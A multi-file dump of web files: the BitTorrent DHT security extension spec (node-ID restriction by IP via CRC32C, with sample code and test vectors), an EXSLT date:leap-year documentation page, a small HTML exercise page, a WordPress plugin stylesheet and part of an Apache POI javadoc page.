<li><a class="reference internal" href="#node-id-restriction" id="id4">Node ID restriction</a></li>
<li><a class="reference internal" href="#bootstrapping" id="id5">bootstrapping</a></li>
<li><a class="reference internal" href="#rationale" id="id6">rationale</a></li>
<li><a class="reference internal" href="#enforcement" id="id7">enforcement</a></li>
<li><a class="reference internal" href="#backwards-compatibility-and-transition" id="id8">backwards compatibility and transition</a></li>
<li><a class="reference internal" href="#forward-compatibility" id="id9">forward compatibility</a></li>
</ul>
</div>
<div class="section" id="id1">
<h1>BitTorrent DHT security extension</h1>
<p>The purpose of this extension is to make it harder to launch a few
specific attacks against the BitTorrent DHT and also to make it harder
to snoop the network.</p>
<p>Specifically the attack this extension intends to make harder is launching
8 or more DHT nodes which node-IDs selected close to a specific target
info-hash, in order to become the main nodes hosting peers for it. Currently
this is very easy to do and lets the attacker not only see all the traffic
related to this specific info-hash but also block access to it by other
peers.</p>
<p>The proposed guard against this is to enforce restrictions on which node-ID
a node can choose, based on its external IP address.</p>
</div>
<div class="section" id="considerations">
<h1>considerations</h1>
<p>One straight forward scheme to tie the node ID to an IP would be to hash
the IP and force the node ID to share the prefix of that hash. One main
draw back of this approach is that an entities control over the DHT key
space grows linearly with its control over the IP address space.</p>
<p>In order to successfully launch an attack, you just need to find 8 IPs
whose hash will be <em>closest</em> to the target info-hash. Given the current
size of the DHT, that is quite likely to be possible by anyone in control
of a /8 IP block.</p>
<p>The size of the DHT is approximately 8.4 million nodes. This is estmiated
by observing that a typical routing table typically has about 20 of its
top routing table buckets full. That means the key space is dense enough
to contain 8 nodes for every combination of the 20 top bits of node IDs.</p>
<blockquote>
<tt class="docutils literal">2^20 * 8 = 8388608</tt></blockquote>
<p>By controlling that many IP addresses, an attacker could snoop any info-hash.
By controlling 8 times that many IP addresses, an attacker could actually
take over any info-hash.</p>
<p>With IPv4, snooping would require a /8 IP block, giving access to 16.7 million
Ips.</p>
<p>Another problem with hashing the IP is that multiple users behind a NAT are
forced to run their DHT nodes on the same node ID.</p>
</div>
<div class="section" id="node-id-restriction">
<h1>Node ID restriction</h1>
<p>In order to avoid the number node IDs controlled to grow linearly by the number
of IPs, as well as allowing more than one node ID per external IP, the node
ID can be restricted at each class level of the IP.</p>
<p>Another important property of the restriction put on node IDs is that the
distribution of the IDs remoain uniform. This is why CRC32C (Castagnoli) was
chosen as the hash function.</p>
<p>The expression to calculate a valid ID prefix (from an IPv4 address) is:</p>
<pre class="literal-block">
crc32c((ip & 0x030f3fff) | (r << 29))
</pre>
<p>And for an IPv6 address (<tt class="docutils literal">ip</tt> is the high 64 bits of the address):</p>
<pre class="literal-block">
crc32c((ip & 0x0103070f1f3f7fff) | (r << 61))
</pre>
<p><tt class="docutils literal">r</tt> is a random number in the range [0, 7]. The resulting integer,
representing the masked IP address is supposed to be big-endian before
hashed. The "|" operator means bit-wise OR.</p>
<p>The details of implementing this is to evaluate the expression, store the
result in a big endian 64 bit integer and hash those 8 bytes with CRC32C.</p>
<p>The first (most significant) 21 bits of the node ID used in the DHT MUST
match the first 21 bits of the resulting hash. The last byte of the hash MUST
match the random number (<tt class="docutils literal">r</tt>) used to generate the hash.</p>
<img alt="ip_id_v4.png" src="ip_id_v4.png" />
<img alt="ip_id_v6.png" src="ip_id_v6.png" />
<p>Example code code for calculating a valid node ID:</p>
<pre class="literal-block">
uint8_t* ip; // our external IPv4 or IPv6 address (network byte order)
int num_octets; // the number of octets to consider in ip (4 or 8)
uint8_t node_id[20]; // resulting node ID
uint8_t v4_mask[] = { 0x03, 0x0f, 0x3f, 0xff };
uint8_t v6_mask[] = { 0x01, 0x03, 0x07, 0x0f, 0x1f, 0x3f, 0x7f, 0xff };
uint8_t* mask = num_octets == 4 ? v4_mask : v6_mask;
for (int i = 0; i < num_octets; ++i)
ip[i] &= mask[i];
uint32_t rand = std::rand() & 0xff;
uint8_t r = rand & 0x7;
ip[0] |= r << 5;
uint32_t crc = 0;
crc = crc32c(crc, ip, num_octets);
// only take the top 21 bits from crc
node_id[0] = (crc >> 24) & 0xff;
node_id[1] = (crc >> 16) & 0xff;
node_id[2] = ((crc >> 8) & 0xf8) | (std::rand() & 0x7);
for (int i = 3; i < 19; ++i) node_id[i] = std::rand();
node_id[19] = rand;
</pre>
<p>test vectors:</p>
<pre class="literal-block">
IP rand example node ID
============ ===== ==========================================
124.31.75.21 1 <strong>5fbfbf</strong> f10c5d6a4ec8a88e4c6ab4c28b95eee4 <strong>01</strong>
21.75.31.124 86 <strong>5a3ce9</strong> c14e7a08645677bbd1cfe7d8f956d532 <strong>56</strong>
65.23.51.170 22 <strong>a5d432</strong> 20bc8f112a3d426c84764f8c2a1150e6 <strong>16</strong>
84.124.73.14 65 <strong>1b0321</strong> dd1bb1fe518101ceef99462b947a01ff <strong>41</strong>
43.213.53.83 90 <strong>e56f6c</strong> bf5b7c4be0237986d5243b87aa6d5130 <strong>5a</strong>
</pre>
<p>The bold parts of the node ID are the important parts. The rest are
random numbers. The last bold number of each row has only its most significant
bit pulled from the CRC32C function. The lower 3 bits are random.</p>
</div>
<div class="section" id="bootstrapping">
<h1>bootstrapping</h1>
<p>In order to set ones initial node ID, the external IP needs to be known. This
is not a trivial problem. With this extension, <em>all</em> DHT responses SHOULD include
a <em>top-level</em> field called <tt class="docutils literal">ip</tt>, containing a compact binary representation of
the requestor's IP and port. That is big endian IP followed by 2 bytes of big endian
port.</p>
<p>The IP portion is the same byte sequence used to verify the node ID.</p>
<p>It is important that the <tt class="docutils literal">ip</tt> field is in the top level dictionary. Nodes that
enforce the node-ID will respond with an error message ("y": "e", "e": { ... }),
whereas a node that supports this extension but without enforcing it will respond
with a normal reply ("y": "r", "r": { ... }).</p>
<p>A DHT node which receives an <tt class="docutils literal">ip</tt> result in a request SHOULD consider restarting
its DHT node with a new node ID, taking this IP into account. Since a single node
can not be trusted, there should be some mechanism to determine whether or
not the node has a correct understanding of its external IP or not. This could
be done by voting, or only restart the DHT once at least a certain number of
nodes, from separate searches, tells you your node ID is incorrect.</p>
</div>
<div class="section" id="rationale">
<h1>rationale</h1>
<p>The choice of using CRC32C instead of a more traditional cryptographic hash
function is justified primarily of these reasons:</p>
<ol class="arabic simple">
<li>it is a fast function</li>
<li>produces well distributed results</li>
<li>there is no need for the hash function to be one-way (the input set is
so small that any hash function could be reversed).</li>
<li>CRC32C (Castagnoli) is supported in hardware by SSE 4.2, which can
significantly speed up computation</li>
</ol>
<p>There are primarily two tests run on SHA-1 and CRC32C to establish the
distribution of results. The first one is the number of bits in the output
set that contain every possible combination of bits. The CRC32C function
has a longer such prefix in its output than SHA-1. This means nodes will still
have well uniformly distributed IDs, even when IP addresses in use are not
uniformly distributed.</p>
<p>The following graph illustrate a few different hash functions with regard
to this property.</p>
<img alt="complete_bit_prefixes.png" src="complete_bit_prefixes.png" />
<p>This test takes into account IP addresses that are not globally routable, i.e.
reserved for local networks, multicast and other things. It also takes into
account that some /8 blocks are not in use by end-users and exremely unlikely
to ever run a DHT node. This makes the results likely to be very similar to
what we would see in the wild.</p>
<p>These results indicate that CRC32C provides the best uniformity in the results
in terms of bit prefixes where all possibilities are represented, and that
no more than 21 bits should be used from the result. If more than 21 bits
were to be used, there would be certain node IDs that would be impossible to
have, which would make routing sub-optimal.</p>
<p>The second test is more of a sanity test for the uniform distribution property.
The target space (32 bit interger) is divided up into 1000 buckets. Every valid
IP and <tt class="docutils literal">r</tt> input is run through the algorithm and the result is put in the
bucket it falls in. The expectation is that each bucket has roughly an equal
number of results falling into it. The following graph shows the resulting
histogram, comparing SHA-1 and CRC32C.</p>
<img alt="hash_distribution.png" src="hash_distribution.png" />
<p>The source code for these tests can be found <a class="reference external" href="https://github.com/arvidn/hash_complete_prefix">here</a>.</p>
<p>The reason to use CRC32C instead of the CRC32 implemented by zlib is that
Intel CPUs have hardware support for the CRC32C calculations. The input
being exactly 4 bytes is also deliberate, to make it fit in a single
instruction.</p>
</div>
<div class="section" id="enforcement">
<h1>enforcement</h1>
<p>Once enforced, write tokens from peers whose node ID does not match its external
IP should be considered dropped. In other words, a peer that uses a non-matching
ID MUST never be used to store information on, regardless of which request. In the
original DHT specification only <tt class="docutils literal">announce_peer</tt> stores data in the network,
but any future extension which stores data in the network SHOULD use the same
restriction.</p>
<p>Any peer on a local network address is exempt from this node ID verification.
This includes the following IP blocks:</p>
<dl class="docutils">
<dt>10.0.0.0/8</dt>
<dd>reserved for local networks</dd>
<dt>172.16.0.0/12</dt>
<dd>reserved for local networks</dd>
<dt>192.168.0.0/16</dt>
<dd>reserved for local networks</dd>
<dt>169.254.0.0/16</dt>
<dd>reserved for self-assigned IPs</dd>
<dt>127.0.0.0/8</dt>
<dd>reserved for loopback</dd>
</dl>
</div>
<div class="section" id="backwards-compatibility-and-transition">
<h1>backwards compatibility and transition</h1>
<p>During some transition period, this restriction should not be enforced, and
peers whose node ID does not match this formula relative to their external IP
should not be blocked.</p>
<p>Requests from peers whose node ID does not match their external IP should
always be serviced, even after the transition period. The attack this protects
from is storing data on an attacker's node, not servicing an attackers request.</p>
</div>
<div class="section" id="forward-compatibility">
<h1>forward compatibility</h1>
<p>If the total size of the DHT grows to the point where the inherent size limit
in this proposal is too small, the modulus constants can be updated in a new
proposal, and another transition period where both sets of modulus constants
are accepted.</p>
</div>
</div>
</body>
</html>
|
build/demosite/WebContent/WEB-INF/mozart/templates/functions/leap-year/date.leap-year.html | mozartframework/cms | <?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html
PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "/schema/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:html="http://www.w3.org/1999/xhtml">
<head><title>EXSLT - date:leap-year - Implementer Page</title>
<link rel="stylesheet" href="base.css"/>
</head>
<body><h1 id="#title"><a href="http://www.exslt.org/">EXSLT</a> - <a href="http://www.exslt.org/date">date</a>:<a
href="http://www.exslt.org/date/functions/leap-year">leap-year</a> - Implementer Page</h1>
<table>
<tr>
<td id="menu"><p class="level1"><a href="index.html">User Page</a></p>
<p class="level1"><a href="../../../howto.html">How To</a></p>
<p class="level1"><a href="../../../download.html">Downloads</a></p>
<p class="level1">Modules</p>
<p class="level2"><a href="../../../date/date.html">Dates and Times</a></p>
<p class="level3"><a href="../../functions/add/date.add.html">date:add()</a></p>
<p class="level3"><a href="../../functions/add-duration/date.add-duration.html">date:add-duration()</a></p>
<p class="level3"><a href="../../functions/date/date.date.html">date:date()</a></p>
<p class="level3"><a href="../../functions/date-time/date.date-time.html">date:date-time()</a></p>
<p class="level3"><a href="../../functions/day-abbreviation/date.day-abbreviation.html">date:day-abbreviation()</a>
</p>
<p class="level3"><a href="../../functions/day-in-month/date.day-in-month.html">date:day-in-month()</a></p>
<p class="level3"><a href="../../functions/day-in-week/date.day-in-week.html">date:day-in-week()</a></p>
<p class="level3"><a href="../../functions/day-in-year/date.day-in-year.html">date:day-in-year()</a></p>
<p class="level3"><a href="../../functions/day-name/date.day-name.html">date:day-name()</a></p>
<p class="level3"><a href="../../functions/day-of-week-in-month/date.day-of-week-in-month.html">date:day-of-week-in-month()</a>
</p>
<p class="level3"><a href="../../functions/difference/date.difference.html">date:difference()</a></p>
<p class="level3"><a href="../../functions/duration/date.duration.html">date:duration()</a></p>
<p class="level3"><a href="../../functions/format-date/date.format-date.html">date:format-date()</a></p>
<p class="level3"><a href="../../functions/hour-in-day/date.hour-in-day.html">date:hour-in-day()</a></p>
<p class="level3"><a href="../../functions/leap-year/date.leap-year.html">date:leap-year()</a></p>
<p class="level3"><a
href="../../functions/minute-in-hour/date.minute-in-hour.html">date:minute-in-hour()</a></p>
<p class="level3"><a href="../../functions/month-abbreviation/date.month-abbreviation.html">date:month-abbreviation()</a>
</p>
<p class="level3"><a href="../../functions/month-in-year/date.month-in-year.html">date:month-in-year()</a>
</p>
<p class="level3"><a href="../../functions/month-name/date.month-name.html">date:month-name()</a></p>
<p class="level3"><a href="../../functions/parse-date/date.parse-date.html">date:parse-date()</a></p>
<p class="level3"><a href="../../functions/second-in-minute/date.second-in-minute.html">date:second-in-minute()</a>
</p>
<p class="level3"><a href="../../functions/seconds/date.seconds.html">date:seconds()</a></p>
<p class="level3"><a href="../../functions/sum/date.sum.html">date:sum()</a></p>
<p class="level3"><a href="../../functions/time/date.time.html">date:time()</a></p>
<p class="level3"><a href="../../functions/week-in-month/date.week-in-month.html">date:week-in-month()</a>
</p>
<p class="level3"><a href="../../functions/week-in-year/date.week-in-year.html">date:week-in-year()</a></p>
<p class="level3"><a href="../../functions/year/date.year.html">date:year()</a></p>
<p class="level3"><a href="../../elements/date-format/date.date-format.html">date:date-format</a></p>
<p class="level2"><a href="../../../dyn/dyn.html">Dynamic</a></p>
<p class="level2"><a href="../../../exsl/exsl.html">Common</a></p>
<p class="level2"><a href="../../../func/func.html">Functions</a></p>
<p class="level2"><a href="../../../math/math.html">Math</a></p>
<p class="level2"><a href="../../../random/random.html">Random</a></p>
<p class="level2"><a href="../../../regexp/regexp.html">Regular Expressions</a></p>
<p class="level2"><a href="../../../set/set.html">Sets</a></p>
<p class="level2"><a href="../../../str/str.html">Strings</a></p>
<p class="level1"><a href="../../../submissions/">Submissions</a></p>
<p class="level1"><a href="../../../list">Mailing List</a></p>
<p class="level1"><a href="../../../contact.html">Contact</a></p></td>
<td id="content"><p><b>Version: </b>1<br/><b>Status: </b>implemented<br/><b>User Page: </b><a href="index.html">index.html</a><br/><b>XML
Definition: </b><a href="date.leap-year.xml">date.leap-year.xml</a><br/><b>Function Package: </b><a
href="date.leap-year.zip">date.leap-year.zip</a></p><h4>Function Syntax</h4>
<pre><var>boolean</var> <b>date:leap-year</b>(<var>string</var>?)</pre>
<h4>Template Syntax</h4>
<pre><xsl:call-template name="<b>date:leap-year</b>">
<xsl:with-param name="date-time" select="<var>string</var>" />?
</xsl:call-template></pre>
<div><p>
The <code>date:leap-year</code> function returns true if the year given in a date is a leap year. If no
argument is given, then the current local date/time, as returned by <code>date:date-time</code> is used
as a default argument.
</p>
<p>
The date/time string specified as the first argument must be a right-truncated string in the format
defined as the lexical representation of <code>xs:dateTime</code> in one of the formats defined in [<a
href="http://www.w3.org/TR/xmlschema-2/" class="offsite">XML Schema Part 2: Datatypes</a>]. The
permitted formats are as follows:
</p>
<ul>
<li><a href="http://www.w3.org/TR/xmlschema-2/#dateTime"
class="offsite"><code>xs:dateTime</code></a>
(<code><var>CCYY</var>-<var>MM</var>-<var>DD</var>T<var>hh</var>:<var>mm</var>:<var>ss</var></code>)
</li>
<li><a href="http://www.w3.org/TR/xmlschema-2/#date" class="offsite"><code>xs:date</code></a>
(<code><var>CCYY</var>-<var>MM</var>-<var>DD</var></code>)
</li>
<li><a href="http://www.w3.org/TR/xmlschema-2/#gYearMonth"
class="offsite"><code>xs:gYearMonth</code></a> (<code><var>CCYY</var>-<var>MM</var></code>)
</li>
<li><a href="http://www.w3.org/TR/xmlschema-2/#gYear" class="offsite"><code>xs:gYear</code></a>
(<code><var>CCYY</var></code>)
</li>
</ul>
<p>
If the date/time string is not in one of these formats, then <code>NaN</code> is returned.
</p></div>
<p>
An implementation of this extension
function
in the EXSLT date namespace must conform to the behaviour described in this document.
</p>
<h2>Implementations</h2>
<p>
Built-in support for <code>date:leap-year</code> is available in the following XSLT processors:
</p>
<table>
<tr>
<th class="rowhead">Processor</th>
<th>Processor Version</th>
<th>Implemented Version</th>
</tr>
<tr>
<td class="rowhead"><a href="http://users.iclway.co.uk/mhkay/saxon/index.html">SAXON from Michael
Kay</a></td>
<td>6.4.2</td>
<td>1</td>
</tr>
<tr>
<td class="rowhead"><a href="http://xml.apache.org/xalan-j">Xalan-J from Apache</a></td>
<td>2.4.D1</td>
<td>1</td>
</tr>
<tr>
<td class="rowhead"><a href="http://4Suite.org">4XSLT, from 4Suite.</a></td>
<td>0.12.0a3</td>
<td>1</td>
</tr>
<tr>
<td class="rowhead"><a href="http://xmlsoft.org/XSLT/">libxslt from Daniel Veillard et al.</a></td>
<td>1.0.19</td>
<td>1</td>
</tr>
</table>
<p>
The following implementations of <code>date:leap-year</code> are available:
</p>
<table>
<tr>
<th class="rowhead">Language</th>
<th>Implemented Version</th>
<th>Creator</th>
<th>Date</th>
<th>Download</th>
</tr>
<tr>
<td class="rowhead"><a href="date.leap-year.function.xsl.html">EXSLT Function</a></td>
<td>1</td>
<td><a href="mailto:mail@jenitennison.com">Jeni Tennison</a></td>
<td>2001-05-13</td>
<td><a href="date.leap-year.function.xsl">date.leap-year.function.xsl</a></td>
</tr>
<tr>
<td class="rowhead"><a href="date.leap-year.template.xsl.html">XSLT Template</a></td>
<td>1</td>
<td><a href="mailto:mail@jenitennison.com">Jeni Tennison</a></td>
<td>2001-05-13</td>
<td><a href="date.leap-year.template.xsl">date.leap-year.template.xsl</a></td>
</tr>
<tr>
<td class="rowhead"><a href="date.js.html">Javascript</a></td>
<td>1</td>
<td><a href="mailto:chris@bayes.co.uk">Chris Bayes</a></td>
<td>2001-06-11</td>
<td><a href="date.js">date.js</a></td>
</tr>
<tr>
<td class="rowhead"><a href="date.msxsl.xsl.html">Msxsl</a></td>
<td>1</td>
<td><a href="mailto:chris@bayes.co.uk">Chris Bayes</a></td>
<td>2001-06-16</td>
<td><a href="date.msxsl.xsl">date.msxsl.xsl</a></td>
</tr>
</table>
<h2>Change History</h2>
<p><b>Submitted: </b>2001-05-13<br/><b>Creator: </b><a href="mailto:mail@jenitennison.com">Jeni Tennison</a>(<a
href="http://www.jenitennison.com/">http://www.jenitennison.com/</a>)</p>
<p>
<dc:description xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:exslt="http://exslt.org/documentation">
Returns true if the year given in a date/time string is a leap year.
</dc:description>
</p>
<table>
<tr>
<th class="rowhead">Version</th>
<th>Modified</th>
<th>By</th>
<th>Details</th>
</tr>
<tr>
<td class="rowhead">1.1</td>
<td style="width: 5em;">2001-06-11</td>
<td><a href="mailto:mail@jenitennison.com">Jeni Tennison</a></td>
<td style="text-align: left;">
<p>
<dc:description xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:exslt="http://exslt.org/documentation">
Added implementations in Javascript, XSLT and EXSLT - Functions.
</dc:description>
</p>
</td>
</tr>
<tr>
<td class="rowhead">1.2</td>
<td style="width: 5em;">2001-06-16</td>
<td><a href="mailto:mail@jenitennison.com">Jeni Tennison</a></td>
<td style="text-align: left;">
<dc:description xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:exslt="http://exslt.org/documentation">
<ul>
<li>Updated Javascript implementation.</li>
<li>Added Microsoft-specific stylesheet.</li>
</ul>
</dc:description>
</td>
</tr>
<tr>
<td class="rowhead">1.3</td>
<td style="width: 5em;">2001-07-20</td>
<td><a href="mailto:mail@jenitennison.com">Jeni Tennison</a></td>
<td style="text-align: left;">
<p>
<dc:description xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:exslt="http://exslt.org/documentation">
Added implementation in Saxon 6.4.2.
</dc:description>
</p>
</td>
</tr>
<tr>
<td class="rowhead">1.4</td>
<td style="width: 5em;">2002-08-21</td>
<td><a href="mailto:craig.stewart@nottingham.ac.uk">Craig Stewart</a></td>
<td style="text-align: left;">
<p>
<dc:description xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:exslt="http://exslt.org/documentation">Added Xalan-J, libxslt and
4XSLT implementation to the list.
</dc:description>
</p>
</td>
</tr>
<tr>
<td class="rowhead">1.5</td>
<td style="width: 5em;">2002-11-12</td>
<td><a href="mailto:craig.stewart@nottingham.ac.uk">Craig Stewart</a></td>
<td style="text-align: left;">
<p>
<dc:description xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#"
xmlns:exslt="http://exslt.org/documentation">Updated 4XSLT version to
0.12.0a3.
</dc:description>
</p>
</td>
</tr>
</table>
</td>
</tr>
</table>
<div id="colophon"><p><a href="http://www.exslt.org/date/functions/leap-year/date.leap-year.html">http://www.exslt.org/date/functions/leap-year/date.leap-year.html</a>
last modified 2002-11-12</p></div>
</body>
</html> |
src/html/exercises/Exercise2-links/page3.html | veltzer/demos-javascript | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Page 3</title>
</head>
<body bgcolor="aqua">
<h1>Welcome to page 3</h1><A href="index.html">
<P>back to home page</P></A>
</body>
</html>
|
css/resource-style.css | johnpaulbalagolan/wp-oer | /**
* WP-OER Plugin
* Resource Page Stylesheet
* Version : 0.1
**/
.cntnr { width:100%; margin:0 auto; }
.sngl_resource_wrapper { width: 100%; float: left; margin-bottom: 10px; }
.rsrclftcntr-img { float: left; width: 42%; margin-right: 35px; }
.rsrcrghtcntr { float: left; width: 54%; padding-top: 38px; }
.sngl-rsrc-url { float: left; font-size: 26px; padding: 0 0 10px 0; line-height: 28px; text-align: left; width: 100%; }
.sngl-rsrc-url a { text-decoration: none; color: #333; }
.sngl-rsrc-img { position: relative; border: 2px solid #dddddd; float: left; width: 100%; }
.sngl-rsrc-img:hover { border: 2px solid #444; }
.sngl-rsrc-img .featureimg { width: auto; float: left; }
.sngl-rsrc-img a { color: #444; text-decoration: none; }
.sngl-rsrc-img .rsrcurl { background: none repeat scroll 0 0 #a8aaab; bottom: 0; left: 0; right: 0; padding: 10px; position: absolute; width: auto; color: #0c5598; font-style: italic; text-align: right; font-size:1.15rem; }
.rsrcrghtcntr .rsrcctgries { float: left; margin: 0px; width: 100%; padding-bottom: 5px; }
.rsrcctgries a { background: none repeat scroll 0 0 #085394; border: 1px solid #000000; color: #ffffff;float: left; padding: 10px 10px; text-decoration: none; width: auto; margin: 0 10px 7px 0; font-weight: bold; }
.rsrcctgries a:hover { background: none repeat scroll 0 0 #06457C; }
.sngl-rsrc-dscrptn { float: left; font-size: 15px; line-height: 20px; width: 100%; padding-bottom: 15px; }
.sngl_resource_wrapper h1 { font-weight: bold; margin-bottom: 8px; font-size: 22px; color: #000; }
.cbxl { float: left; margin-bottom: 5px; width: 100%; }
.cbxl > h3 { margin-bottom: 5px; font-weight: bold; font-size: 14px; width: auto; float: left; margin-right: 15px; }
.view { float: left; font-size: 15px; }
.cbxl .view a { color: #1d57a8; text-decoration: underline; width: auto; font-size: 15px; vertical-align:top; }
.mediaType { margin-top: 10px; }
.rsrckeyword { width: 100%; float: left; margin-top: 25px; }
.rsrckeyword .meta_container span a:hover { background: none repeat scroll 0 0 #777; }
.rsrckeyword h3 { float: left; font-size: 20px; font-weight: bold; line-height: 22px; margin-bottom: 10px;margin-right: 15px; width: 100%; }
.rsrckeyword .meta_container { float: left; font-size: 15px; margin: 0; padding-left: 0; width: 100%; }
.rsrckeyword .meta_container span { width: auto; float: left; margin: 0 10px 7px 0; padding: 0px; border: medium none; border-radius: 0px; font-size:14px; }
.rsrckeyword .meta_container span a { background: none repeat scroll 0 0 #999999; border: 2px solid #085394; color: #ffffff; float: left; font-weight: bold; padding: 6px 12px; text-decoration: none; width: auto; }
.sngl-rsrc-meta { width: 100%; float: left; margin-top: 30px; }
.rsrclftcntr { float: left; width: 50%; }
/** For Mobile styles **/
@media screen and (min-width: 960px) {
.sngl-rsrc-dscrptn { width: 100%; }
} |
poi-3.8/docs/apidocs/org/apache/poi/hssf/record/DBCellRecord.html | gmchen/MosquitoSimulation | <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<!--NewPage-->
<HTML>
<HEAD>
<!-- Generated by javadoc (build 1.6.0_29) on Sat Mar 17 18:04:30 MSK 2012 -->
<TITLE>
DBCellRecord (POI API Documentation)
</TITLE>
<META NAME="date" CONTENT="2012-03-17">
<LINK REL ="stylesheet" TYPE="text/css" HREF="../../../../../stylesheet.css" TITLE="Style">
<SCRIPT type="text/javascript">
function windowTitle()
{
if (location.href.indexOf('is-external=true') == -1) {
parent.document.title="DBCellRecord (POI API Documentation)";
}
}
</SCRIPT>
<NOSCRIPT>
</NOSCRIPT>
</HEAD>
<BODY BGCOLOR="white" onload="windowTitle();">
<HR>
<!-- ========= START OF TOP NAVBAR ======= -->
<A NAME="navbar_top"><!-- --></A>
<A HREF="#skip-navbar_top" title="Skip navigation links"></A>
<TABLE BORDER="0" WIDTH="100%" CELLPADDING="1" CELLSPACING="0" SUMMARY="">
<TR>
<TD COLSPAN=2 BGCOLOR="#EEEEFF" CLASS="NavBarCell1">
<A NAME="navbar_top_firstrow"><!-- --></A>
<TABLE BORDER="0" CELLPADDING="0" CELLSPACING="3" SUMMARY="">
<TR ALIGN="center" VALIGN="top">
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../overview-summary.html"><FONT CLASS="NavBarFont1"><B>Overview</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-summary.html"><FONT CLASS="NavBarFont1"><B>Package</B></FONT></A> </TD>
<TD BGCOLOR="#FFFFFF" CLASS="NavBarCell1Rev"> <FONT CLASS="NavBarFont1Rev"><B>Class</B></FONT> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="class-use/DBCellRecord.html"><FONT CLASS="NavBarFont1"><B>Use</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="package-tree.html"><FONT CLASS="NavBarFont1"><B>Tree</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../deprecated-list.html"><FONT CLASS="NavBarFont1"><B>Deprecated</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../index-all.html"><FONT CLASS="NavBarFont1"><B>Index</B></FONT></A> </TD>
<TD BGCOLOR="#EEEEFF" CLASS="NavBarCell1"> <A HREF="../../../../../help-doc.html"><FONT CLASS="NavBarFont1"><B>Help</B></FONT></A> </TD>
</TR>
</TABLE>
</TD>
<TD ALIGN="right" VALIGN="top" ROWSPAN=3><EM>
</EM>
</TD>
</TR>
<TR>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../org/apache/poi/hssf/record/DateWindow1904Record.html" title="class in org.apache.poi.hssf.record"><B>PREV CLASS</B></A>
<A HREF="../../../../../org/apache/poi/hssf/record/DBCellRecord.Builder.html" title="class in org.apache.poi.hssf.record"><B>NEXT CLASS</B></A></FONT></TD>
<TD BGCOLOR="white" CLASS="NavBarCell2"><FONT SIZE="-2">
<A HREF="../../../../../index.html?org/apache/poi/hssf/record/DBCellRecord.html" target="_top"><B>FRAMES</B></A>
<A HREF="DBCellRecord.html" target="_top"><B>NO FRAMES</B></A>
<SCRIPT type="text/javascript">
<!--
if(window==top) {
document.writeln('<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>');
}
//-->
</SCRIPT>
<NOSCRIPT>
<A HREF="../../../../../allclasses-noframe.html"><B>All Classes</B></A>
</NOSCRIPT>
</FONT></TD>
</TR>
<TR>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
SUMMARY: <A HREF="#nested_class_summary">NESTED</A> | <A HREF="#field_summary">FIELD</A> | <A HREF="#constructor_summary">CONSTR</A> | <A HREF="#method_summary">METHOD</A></FONT></TD>
<TD VALIGN="top" CLASS="NavBarCell3"><FONT SIZE="-2">
DETAIL: <A HREF="#field_detail">FIELD</A> | <A HREF="#constructor_detail">CONSTR</A> | <A HREF="#method_detail">METHOD</A></FONT></TD>
</TR>
</TABLE>
<A NAME="skip-navbar_top"></A>
<!-- ========= END OF TOP NAVBAR ========= -->
<HR>
<!-- ======== START OF CLASS DATA ======== -->
<H2>
<FONT SIZE="-1">
org.apache.poi.hssf.record</FONT>
<BR>
Class DBCellRecord</H2>
<PRE>
java.lang.Object
<IMG SRC="../../../../../resources/inherit.gif" ALT="extended by "><A HREF="../../../../../org/apache/poi/hssf/record/RecordBase.html" title="class in org.apache.poi.hssf.record">org.apache.poi.hssf.record.RecordBase</A>
<IMG SRC="../../../../../resources/inherit.gif" ALT="extended by "><A HREF="../../../../../org/apache/poi/hssf/record/Record.html" title="class in org.apache.poi.hssf.record">org.apache.poi.hssf.record.Record</A>
<IMG SRC="../../../../../resources/inherit.gif" ALT="extended by "><A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html" title="class in org.apache.poi.hssf.record">org.apache.poi.hssf.record.StandardRecord</A>
<IMG SRC="../../../../../resources/inherit.gif" ALT="extended by "><B>org.apache.poi.hssf.record.DBCellRecord</B>
</PRE>
<HR>
<DL>
<DT><PRE>public final class <B>DBCellRecord</B><DT>extends <A HREF="../../../../../org/apache/poi/hssf/record/StandardRecord.html" title="class in org.apache.poi.hssf.record">StandardRecord</A></DL>
</PRE>
<P>
Title: DBCell Record (0x00D7)<p/>
Description: Used by Excel and other MS apps to quickly find rows in the sheets.<P>
REFERENCE: PG 299/440 Microsoft Excel 97 Developer's Kit (ISBN: 1-57231-498-2)<P>
<P>
<P>
<DL>
<DT><B>Author:</B></DT>
<DD>Andrew C. Oliver (acoliver at apache dot org), Jason Height</DD>
</DL>
<HR>
<P>
<!-- ======== NESTED CLASS SUMMARY ======== -->
<A NAME="nested_class_summary"><!-- --></A>
